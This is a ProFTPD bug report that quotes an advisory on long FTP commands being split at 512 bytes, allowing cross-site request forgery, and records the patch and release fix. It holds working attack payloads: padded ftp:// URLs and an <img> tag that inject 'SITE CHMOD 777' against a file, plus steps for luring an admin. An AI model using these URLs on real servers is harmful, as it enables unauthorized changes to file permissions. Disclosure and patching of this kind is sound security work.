Bug 3115 - Cross-site request forgery
Status: CLOSED FIXED
Product: ProFTPD
Component: core
Version: 1.3.1
Hardware: All
OS: All
Priority: P2
Severity: normal
Assigned To: proftpd development group
Reported: 2008-09-20 16:10 UTC by TJ Saunders
Modified: 2009-03-02 09:49 UTC (History)

Attachments
Fixes bug (5.30 KB, patch), 2008-09-20 16:13 UTC, TJ Saunders

Description TJ Saunders 2008-09-20 16:10:27 UTC
Maksymilian Arciemowicz of securityreason.com reported the following:

ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The
server uses the TCP protocol and listens at the port specified with the -P
option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one click attack, sidejacking or
session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of
malicious exploit of a website whereby unauthorized commands are
transmitted from a user the website trusts. Contrary to cross-site
scripting (XSS), which exploits the trust a user has for a particular site,
cross-site request forgery exploits the trust that a site has for a
particular user.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

--- 1. ftpd *BSD - Cross-site request forgery ---
The main problem exists in splitting a long command into several others. The
problem stems from the use of the while() loop and the fgets() function.

Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

will be split into

500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA':
command not understood.
500'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

When we try to call the ftp daemon via a browser and the path is longer than
512, our URL will be split.

/* FreeBSD 7.0 */
ftp://cxib@127.0.0.1//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst

return result from SYST command:
215 UNIX Type: L8 Version: BSD-199506

/* NetBSD 4.0 */
ftp://ftp.netbsd.org//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SYST

return result from SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609

The situation can be dangerous, because this bug can be exploited like any
CSRF attack: we can use the SITE CHMOD command to change file permissions.
We only need some exploit and the luck that the admin will execute it.

How to exploit it?

0. Create some html file with <img> tags
<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
..

1. Give the prepared URL to the admin.

Example:
ftp://ftp.netbsd.org//////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

will change the permissions of EXAMPLEFILE when the owner uses this URL.

I think there should be some byte that informs about the overflow (an empty
command should null this byte). We have diagnosed this issue on BSD systems.
Unfortunately, we do not know exactly how many machines can be infected.

--- 2. How to fix ---
OpenBSD has been informed first. The fix is available on cvs:

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

Thanks to the OpenBSD team.
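As an added illustration of the failure mode the advisory describes (this is not code from the advisory, from ProFTPD or from any BSD ftpd), here is a minimal C command reader in the vulnerable while()/fgets() style beside a hardened reader that treats a chunk without a trailing newline as an over-long line, drains the remainder and rejects it instead of parsing the fragment. The 16-byte buffer, the tmpfile-backed stream and the input line are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>
#define CMD_BUF 16  /* deliberately small; the servers in the advisory use 512 */

/* Vulnerable pattern from the advisory: every fgets() chunk of an over-long
 * line goes to the command parser, so the tail of a long URL path (here
 * "SYST") arrives as a command of its own. Returns 1 on a command, 0 at EOF. */
static int read_cmd_naive(FILE *in, char *buf, size_t sz) {
    return fgets(buf, (int)sz, in) != NULL;
}

/* Hardened reader: no trailing newline means the line did not fit. Drain the
 * rest and reject it as one over-long command instead of returning the
 * fragment. Returns 1 = command, 0 = EOF, -1 = over-long line discarded. */
static int read_cmd_safe(FILE *in, char *buf, size_t sz) {
    int c;
    if (fgets(buf, (int)sz, in) == NULL) return 0;
    if (strchr(buf, '\n') != NULL) return 1;
    c = fgetc(in);
    if (c == '\n' || c == EOF) return 1;      /* line fit the buffer exactly */
    while ((c = fgetc(in)) != EOF && c != '\n')
        ;                                      /* discard the overflow */
    buf[0] = '\0';
    return -1;
}

/* Readable FILE* over a constructed control-connection transcript. */
static FILE *stream_from(const char *text) {
    FILE *f = tmpfile();
    if (f != NULL) { fputs(text, f); rewind(f); }
    return f;
}

static char last_cmd[CMD_BUF];   /* last command a reader accepted */

/* Count the commands a reader would hand to the parser for 'input'. */
static int count_cmds(int (*reader)(FILE *, char *, size_t), const char *input) {
    char buf[CMD_BUF];
    FILE *f = stream_from(input);
    int n = 0, r;
    last_cmd[0] = '\0';
    if (f == NULL) return -1;
    while ((r = reader(f, buf, sizeof buf)) != 0)
        if (r == 1) { n++; strcpy(last_cmd, buf); }
    fclose(f);
    return n;
}

/* Constructed input modelled on the advisory's long ftp:// URL, scaled to the 16-byte buffer. */
static const char LONG_LINE[] = "//////////////////////////////SYST\n";
```

With the naive reader the 35-byte line yields three "commands", the last of which is the injected SYST; the hardened reader yields none, while a line that fits the buffer exactly is still accepted.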
Comment 1 TJ Saunders 2008-09-20 16:13:52 UTC
Created attachment 2871 [details]
Fixes bug
Comment 2 TJ Saunders 2008-09-20 16:20:38 UTC
Patch committed to CVS.

The patch also covers the case where the admin might configure a
PR_TUNABLE_BUFFER_SIZE which is smaller than the default command buffer size
(i.e. the buffer size which is used by default if the CommandBufferSize
configuration directive is not configured).
Comment 3 TJ Saunders 2008-11-21 00:56:49 UTC
Resolved in 1.3.2rc3.